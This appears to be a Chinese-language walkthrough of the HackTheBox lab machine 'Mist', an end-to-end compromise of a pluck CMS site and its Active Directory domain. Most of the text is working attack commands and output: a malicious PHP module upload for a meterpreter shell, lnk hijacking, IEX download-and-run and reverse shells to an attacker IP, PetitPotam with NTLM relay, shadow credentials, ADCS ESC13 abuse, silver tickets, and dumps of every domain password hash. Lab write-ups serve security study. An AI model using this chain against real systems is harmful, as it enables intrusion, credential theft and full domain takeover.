基本信息

端口扫描

只有80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
$ nmap -sC -sV 10.10.11.17
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-01 13:21 CST
Nmap scan report for 10.10.11.17
Host is up (0.073s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
| http-title: Mist - Mist
|_Requested resource was http://10.10.11.17/?file=mist
|_http-generator: pluck 4.7.18
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-robots.txt: 2 disallowed entries
|_/data/ /docs/

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.55 seconds

80

很简单的页面,powered by pluck

目录扫描

robots.txt里可以看到两个目录,直接访问是跳到首页:

1
2
3
User-agent: *
Disallow: /data/
Disallow: /docs/

modules

进一步扫描目录可以发现modules,可以直接查看:

1
2
3
4
5
6
7
8
9
10
11
gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://10.10.11.17/data/ -x php

/Image                (Status: 301) [Size: 339] [--> http://10.10.11.17/data/Image/]
/Themes               (Status: 301) [Size: 340] [--> http://10.10.11.17/data/Themes/]
/image                (Status: 301) [Size: 339] [--> http://10.10.11.17/data/image/]
/inc                  (Status: 301) [Size: 337] [--> http://10.10.11.17/data/inc/]
/index.html           (Status: 200) [Size: 48]
/modules              (Status: 301) [Size: 341] [--> http://10.10.11.17/data/modules/]
/settings             (Status: 301) [Size: 342] [--> http://10.10.11.17/data/settings/]
/themes               (Status: 301) [Size: 340] [--> http://10.10.11.17/data/themes/]
/trash                (Status: 301) [Size: 339] [--> http://10.10.11.17/data/trash/]

LFI

modules中可以看到albums,存在LFI:

根据其中内容,在 http://10.10.11.17/data/settings/modules/albums/ 可以看到 admin_backup.php:

然后通过LFI去读取这个文件,得到一个hash:

可以破解出密码:

1
2
3
c81dde783f9543114ecd9fa14e8440a2a868bfe0bacdf14d29fce0605c09d5a2bcd2028d0d7a3fa805573d074faa15d6361f44aec9a6efe18b754b3c265ce81e

lexypoo97

plunk

然后就可以回到首页,使用得到的密码登录admin:

pluck rce

根据版本号4.7.18,可以搜到相关命令漏洞:

基本就是上传一个包含恶意php的zip作为module安装来获取shell,通过webshell再来获取稳定shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msfvenom -p php/meterpreter_reverse_tcp -f raw LHOST=10.10.16.13 LPORT=4444 -o miao.php

zip miao.zip miao.php

options -> manage modules -> install a module 

http://10.10.11.17/data/modules/miao/miao.php

msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe  LHOST=10.10.16.13 LPORT=4445 -o miao.exe

C:\xampp\htdocs\files

upload miao.exe
execute -H -f miao.exe

打到MS01的本地svc_web:

信息

基础枚举,发现一个网络共享,里面是几个快捷方式:

lnk hijack

网络共享就会有其他人访问,尝试修改其中的lnk文件:

1
2
3
4
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Calculator.lnk")
$lnk.TargetPath = "C:\xampp\htdocs\files\miao.exe"
$lnk.Save()

然后等几分钟自动执行,得到MS01上域用户brandon:

brandon

brandon用户是MIST域用户,基础枚举获取dc ip,打通隧道:

1
2
3
4
5
6
7
8
9
10
11
IEX ((new-object net.webclient).downloadstring('http://10.10.16.13:7777/adPEAS.ps1'))
invoke-adpeas

192.168.100.100 DC01.mist.htb

upload chisel.exe

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse
# target
chisel.exe client 10.10.16.13:9999 R:socks

Certificate

brandon也有一个证书,但没有可导出的私钥,那就自己请求一个新证书,然后pass the Certificate得到brandon的hash:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
PS C:\xampp\htdocs> gci Cert:\CurrentUser\UserDS\ | select *

Brandon.Keywarp@mist.htb
mist-DC01-CA

Certify.exe cas /ca:DC01\mist-DC01-CA
Certify.exe find ca:DC01\mist-DC01-CA

User

Certify.exe request /ca:DC01\mist-DC01-CA /template:User

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
# 自己设置导出密码

proxychains4 python3 ~/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ./cert.pfx -pfx-pass "miao" MIST.HTB/Brandon.Keywarp Brandon.Keywarp.ccache -dc-ip 192.168.100.100 -v

4e796b9c8a5abf10cae7495bc5bd0844fb65f7b46283bc6a511bb78031c14479

export KRB5CCNAME=./Brandon.Keywarp.ccache

proxychains4 python3 ~/Tools/PKINITtools/getnthash.py mist.htb/Brandon.Keywarp -key 4e796b9c8a5abf10cae7495bc5bd0844fb65f7b46283bc6a511bb78031c14479

Recovered NT Hash
db03d6a77a2205bc1d07082740626cc9

PetitPotam

现在有了一个域用户,接下来就可以尝试强制访问:

在ms01上启用webdav client

1
2
3
upload enableWebdev.ps1

PS C:\xampp\htdocs\files>.\enableWebdev.ps1

然后转发端口,打PetitPotam:

1
2
3
4
5
6
7
8
9
10
sudo python3 Responder.py -i 10.10.16.13 -v

meterpreter > upload socat.zip
Expand-Archive -Path C:\xampp\htdocs\files\socat.zip -DestinationPath C:\xampp\htdocs\files\

.\socat.exe tcp-listen:2525,reuseaddr,fork tcp:10.10.16.13:80

proxychains4 ~/Tools/impacket/bin/python3 PetitPotam.py -u "brandon.keywarp" -d mist.htb -hashes ":db03d6a77a2205bc1d07082740626cc9" "ms01@2525/miaomiaomiao" 192.168.100.101 -pipe all

# 每次运行PetitPotam之前先运行一次enableWebdev

能够触发强制访问

relay & shadow creds

接下来就是通过relay获取ldap shell,清除shadow creds,然后添加新的:

1
2
3
4
sudo proxychains4 ./bin/python3 examples/ntlmrelayx.py -t ldap://dc01.mist.htb -i

# clear_shadow_creds MS01$
# set_shadow_creds MS01$

enableWebdev.ps1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
$Source = @"
using System;
using System.Text;
using System.Security;
using System.Collections.Generic;
using System.Runtime.Versioning;
using Microsoft.Win32.SafeHandles;
using System.Runtime.InteropServices;
using System.Diagnostics.CodeAnalysis;
namespace JosL.WebClient{
public static class Starter{
[StructLayout(LayoutKind.Explicit, Size=16)]
public class EVENT_DESCRIPTOR{
[FieldOffset(0)]ushort Id = 1;
[FieldOffset(2)]byte Version = 0;
[FieldOffset(3)]byte Channel = 0;
[FieldOffset(4)]byte Level = 4;
[FieldOffset(5)]byte Opcode = 0;
[FieldOffset(6)]ushort Task = 0;
[FieldOffset(8)]long Keyword = 0;
}

[StructLayout(LayoutKind.Explicit, Size = 16)]
public struct EventData{
[FieldOffset(0)]
internal UInt64 DataPointer;
[FieldOffset(8)]
internal uint Size;
[FieldOffset(12)]
internal int Reserved;
}

public static void startService(){
Guid webClientTrigger = new Guid(0x22B6D684, 0xFA63, 0x4578, 0x87, 0xC9, 0xEF, 0xFC, 0xBE, 0x66, 0x43, 0xC7);

long handle = 0;
uint output = EventRegister(ref webClientTrigger, IntPtr.Zero, IntPtr.Zero, ref handle);

bool success = false;

if (output == 0){
EVENT_DESCRIPTOR desc = new EVENT_DESCRIPTOR();
unsafe
{
uint writeOutput = EventWrite(handle, ref desc, 0, null);
success = writeOutput == 0;
EventUnregister(handle);
}
}
}

[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventRegister(ref Guid guid, [Optional] IntPtr EnableCallback, [Optional] IntPtr CallbackContext, [In][Out] ref long RegHandle);

[DllImport("Advapi32.dll", SetLastError = true)]
public static extern unsafe uint EventWrite(long RegHandle, ref EVENT_DESCRIPTOR EventDescriptor, uint UserDataCount, EventData* UserData);

[DllImport("Advapi32.dll", SetLastError = true)]
public static extern uint EventUnregister(long RegHandle);
}
}
"@
$compilerParameters = New-Object System.CodeDom.Compiler.CompilerParameters
$compilerParameters.CompilerOptions="/unsafe"
Add-Type -TypeDefinition $Source -Language CSharp -CompilerParameters $compilerParameters
[JosL.WebClient.Starter]::startService()

Pass the Certificate

拿到证书后就还是Pass the Certificate:

1
2
3
4
5
6
7
8
9
10
11
proxychains4 python3 ~/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ./haSz3Dmd.pfx -pfx-pass "TugrKU8sXDVRT9StpNIy" MIST.HTB/MS01$ ms01.ccache -dc-ip 192.168.100.100 -v

35beedab39d5e8752bfce27e30a406e4c50b852d72b86833b7e095fb9c89854a

export KRB5CCNAME=./ms01.ccache

proxychains4 python3 ~/Tools/PKINITtools/getnthash.py mist.htb/ms01\$ -key 35beedab39d5e8752bfce27e30a406e4c50b852d72b86833b7e095fb9c89854a

[*] Requesting ticket to self with PAC
Recovered NT Hash
4a74fc05400345d580cf58aec3e6d833

现在获取了ms01的机器hash后就可以伪造任意用户了:

前面的流程和vullab的Sidecar很像,可以直接参考:

1
2
3
4
5
6
7
8
9
10
11
12
Rubeus.exe asktgt /nowrap /user:"ms01$" /rc4:4a74fc05400345d580cf58aec3e6d833

.\Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:"cifs/ms01.mist.htb" /ticket:doIFLxxxxxx

python3 rubeustoccache.py <base64_tgs> ms01.kirbi ms01.ccache
export KRB5CCNAME=./ms01.ccache
proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/wmiexec.py Administrator@ms01.mist.htb -k -no-pass -debug

# S-1-5-21-1045809509-3006658589-2426055941-1108
# 也可以直接用impacket制作本地管理员的票据
proxychains4 ./bin/python3 ./examples/ticketer.py -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -domain mist.htb -spn HOST/MS01.mist.htb -nthash 4a74fc05400345d580cf58aec3e6d833 -user-id 500 Administrator
export KRB5CCNAME=./Administrator.ccache

ms01 hashdump

1
2
3
4
5
6
7
8
proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py Administrator@ms01.mist.htb -k -no-pass -debug

[*] Target system bootKey: 0xe3a142f26a6e42446aa8a55e39cbcd86

Administrator:500:aad3b435b51404eeaad3b435b51404ee:711e6a685af1c31c4029c3c7681dd97b:::
svc_web:1000:aad3b435b51404eeaad3b435b51404ee:76a99f03b1d2656e04c39b46e16b48c8:::
MIST\MS01$:aad3b435b51404eeaad3b435b51404ee:4a74fc05400345d580cf58aec3e6d833:::
svc_web:MostSavagePasswordEver123

user flag

ms01的Administrator桌面

Sharon.Mullard

Sharon.Mullard用户Documents目录一个kdbx文件,下载下来,Pictures目录两张图也是同样操作:

1
2
3
C:\users\Sharon.Mullard\Documents>lget sharon.kdbx
C:\users\Sharon.Mullard\Pictures>lget cats.png
C:\users\Sharon.Mullard\Pictures>lget image_20022024.png

image_20022024.png图片上是一半密码和几条todo:

合理猜测就是keepass密码,根据已知部分结合字典爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
UA7cpa[#1!_*ZX

keepass2john sharon.kdbx

sharon:$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d5871520815f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc

# 转换为hashcat格式
cat hash.txt| grep -o "$keepass$.*" > hash2.txt

# test.rule
^X^Z^*^_^!^1^#^[^a^p^c^7^A^U
# words.txt是所有可打印字符
hashcat -a 0 -m 13400 -r test.rule hash2.txt words.txt

# 破解出来密码
UA7cpa[#1!_*ZX@

然后使用得到的keepass密码打开kdbx,得到operative account密码.并且根据标题可以猜测对应域用户op_Sharon.Mullard:

1
2
3
ImTiredOfThisJob:(

op_Sharon.Mullard

切换用户:

1
RunasCs.exe op_Sharon.Mullard ImTiredOfThisJob:( -d mist.htb cmd.exe -r 10.10.16.13:4446  --bypass-uac

Winrm

op_Sharon.Mullard可以winrm登录到dc:

1
2
3
proxychains4 netexec winrm 192.168.100.100 -u op_Sharon.Mullard -p "ImTiredOfThisJob:(" -X whoami

proxychains4 netexec winrm 192.168.100.100 -u op_Sharon.Mullard -p "ImTiredOfThisJob:(" -X "IEX ((new-object net.webclient).downloadstring('http://10.10.16.13:7777/Invoke-PowerShellTcp.ps1'))"

gmsa

根据bloodhound分析,op_Sharon.Mullard可以读svc_ca$的gmsa:

svc_ca$

通过op_Sharon.Mullard读gmsa得到svc_ca$:

1
2
3
proxychains4 netexec ldap 192.168.100.100 -u op_Sharon.Mullard -p "ImTiredOfThisJob:(" --gmsa

LDAP        192.168.100.100 636    DC01             Account: svc_ca$              NTLM: 6db5b4f0e49cf6da4c937944d58c416b

然后svc_ca$又对svc_cabackup有AddKeyCredentialLink权限:

svc_cabackup

那就是继续影子证书+Pass the Certificate获取svc_cabackup的ntlm hash:

1
2
3
4
5
6
7
8
9
10
11
12
proxychains4 python3 pywhisker.py -d "mist.htb" --dc-ip 192.168.100.100 -u 'svc_ca$' -H 6db5b4f0e49cf6da4c937944d58c416b --target "svc_cabackup" --action "add"

proxychains4 python3 ~/Tools/PKINITtools/gettgtpkinit.py -cert-pfx ./g3gHXvGL.pfx -pfx-pass "pRQp8wIwljQzDPjbgfUl" MIST.HTB/svc_cabackup svc_cabackup.ccache -dc-ip 192.168.100.100 -v

a2db4e1a80dad031169f0ee3703b617aa67eab403975cece0497dc28cff5202f

export KRB5CCNAME=./svc_cabackup.ccache

proxychains4 python3 ~/Tools/PKINITtools/getnthash.py mist.htb/svc_cabackup -key a2db4e1a80dad031169f0ee3703b617aa67eab403975cece0497dc28cff5202f

Recovered NT Hash
c9872f1bc10bdd522c12fc2ac9041b64

ADCS

ESC13

根据svc_cabackup的组,查看ADCS,这部分是ESC13,还没合到标准分支里:

1
2
3
4
5
6
proxychains4 ./bin/certipy find -vulnerable -u svc_cabackup@mist.htb -hashes :c9872f1bc10bdd522c12fc2ac9041b64  -dc-ip 192.168.100.100 -stdout

ManagerAuthentication
mist-DC01-CA
    
      ESC13                             : 'MIST.HTB\\Certificate Services' can enroll, template allows client authentication and issuance policy is linked to group ['CN=Certificate Managers,CN=Users,DC=mist,DC=htb']

esc13 abuse

直接请求证书会报错,根据报错信息知道是key size问题,要手动指定keysize为4096,默认是2048

1
2
3
4
5
6
7
8
9
10
11
proxychains4 ./bin/certipy req  -u svc_cabackup@mist.htb -hashes :c9872f1bc10bdd522c12fc2ac9041b64  -dc-ip 192.168.100.100 -dns 192.168.100.100 -ca mist-DC01-CA -target DC01.mist.htb -template ManagerAuthentication -key-size 4096 -debug

[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

proxychains4 ./bin/certipy auth -pfx ./svc_cabackup.pfx -dc-ip 192.168.100.100 -kirbi

python3 ~/Tools/impacket/examples/ticketConverter.py ./svc_cabackup.kirbi ./svc_cabackup.ccache

export KRB5CCNAME=./svc_cabackup.ccache

现在得到的拥有Certificate Managers权限

BackupSvcAuthentication

然后Certificate Managers可以申请BackupSvcAuthentication证书,使用这个证书再获取新的票据:

1
2
3
4
5
proxychains4 ./bin/certipy req -u 'svc_cabackup@mist.htb' -k -no-pass -dc-ip 192.168.100.100 -dns 192.168.100.100 -ca mist-DC01-CA -target DC01.mist.htb -template 'BackupSvcAuthentication' -ca mist-DC01-CA -key-size 4096 -debug

proxychains4 ./bin/certipy auth -pfx ./svc_cabackup.pfx -dc-ip 192.168.100.100 -debug

export KRB5CCNAME=./svc_cabackup.ccache

registry

BackupSvc根据名字就是有备份权限,常规的备份注册表提取hash:

1
2
3
4
5
6
7
8
9
~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/smbserver.py  -smb2support miao .

proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/reg.py mist.htb/svc_cabackup@dc01.mist.htb -k -no-pass -dc-ip 192.168.100.100 backup -o '\\10.10.16.13\miao\'

proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py -sam SAM.save -system SYSTEM.save -security SECURITY.save LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e121bd371bd4bbaca21175947013dd7:::

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260

得到的是本地Administrator不能直接用,但也得到了DC01的machine hash,然后就可以直接制作票据再去dump域Administrator了:

1
2
3
4
5
6
proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/ticketer.py -domain-sid S-1-5-21-1045809509-3006658589-2426055941 -domain mist.htb -spn HOST/DC01.mist.htb -nthash e768c4cf883a87ba9e96278990292260 -user-id 500 Administrator
export KRB5CCNAME=./Administrator.ccache

proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py Administrator@dc01.mist.htb -k -no-pass -just-dc-user Administrator

Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::

root flag

然后就可以直接登录DC01了,也可以在上一步制作完票据后直接登录:

1
2
3
proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/psexec.py  Administrator@192.168.100.100 -hashes :b46782b9365344abdff1a925601e0385

proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/psexec.py Administrator@dc01.mist.htb -k -no-pass

hashdump

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
proxychains4 ~/Tools/impacket/bin/python3 ~/Tools/impacket/examples/secretsdump.py Administrator@192.168.100.100 -hashes :b46782b9365344abdff1a925601e0385 -just-dc-ntlm

Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:298fe98ac9ccf7bd9e91a69b8c02e86f:::
Sharon.Mullard:1109:aad3b435b51404eeaad3b435b51404ee:1f806175e243ed95db55c7f65edbe0a0:::
Brandon.Keywarp:1110:aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9:::
Florence.Brown:1111:aad3b435b51404eeaad3b435b51404ee:9ee69a8347d91465627365c41214edd6:::
Jonathan.Clinton:1112:aad3b435b51404eeaad3b435b51404ee:165fbae679924fc539385923aa16e26b:::
Markus.Roheb:1113:aad3b435b51404eeaad3b435b51404ee:74f1d3e2e40af8e3c2837ba96cc9313f:::
Shivangi.Sumpta:1114:aad3b435b51404eeaad3b435b51404ee:4847f5daf1f995f14c262a1afce61230:::
Harry.Beaucorn:1115:aad3b435b51404eeaad3b435b51404ee:a3188ac61d66708a2bd798fa4acca959:::
op_Sharon.Mullard:1122:aad3b435b51404eeaad3b435b51404ee:d25863965a29b64af7959c3d19588dd7:::
op_Markus.Roheb:1123:aad3b435b51404eeaad3b435b51404ee:73e3be0e5508d1ffc3eb57d48b7b8a92:::
svc_smb:1125:aad3b435b51404eeaad3b435b51404ee:1921d81fdbc829e0a176cb4891467185:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260:::
MS01$:1108:aad3b435b51404eeaad3b435b51404ee:4a74fc05400345d580cf58aec3e6d833:::
svc_ca$:1124:aad3b435b51404eeaad3b435b51404ee:34956e4924985c2f1b7ba808cd54bcb8:::
[*] Cleaning up...

参考资料